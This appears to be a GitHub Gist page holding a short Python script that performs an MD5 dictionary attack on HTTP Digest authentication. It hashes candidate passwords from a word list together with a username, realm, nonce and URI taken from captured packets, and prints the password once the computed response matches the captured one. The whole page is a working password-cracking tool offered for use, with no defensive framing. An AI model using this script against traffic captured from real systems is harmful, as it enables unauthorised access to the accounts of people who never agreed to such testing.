Created
May 20, 2018 19:41
-
-
Save crookm/c10c841ca946e8b96cffbf12cdb056f4 to your computer and use it in GitHub Desktop.
Basic MD5 dictionary attack on digest HTTP authentication methods - variables should be filled-in with captured packets
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| extracted = 'known_auth_hash' | |
| nonce = 'known_nonce_hash' | |
| user = 'known_username' | |
| realm = 'known_realm' | |
| uri = '/image.png' | |
| method = 'GET' | |
| with open('words.txt', 'r') as file: | |
| for line in file: | |
| line = line.strip() | |
| ha1 = hashlib.md5((user+':'+realm+':'+line).encode('utf-8')).hexdigest() | |
| ha2 = hashlib.md5((method+':'+uri).encode('utf-8')).hexdigest() | |
| response = hashlib.md5((ha1+':'+nonce+':'+ha2).encode('utf-8')).hexdigest() | |
| if response == extracted: | |
| print('success! word was:', line) | |
| break |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment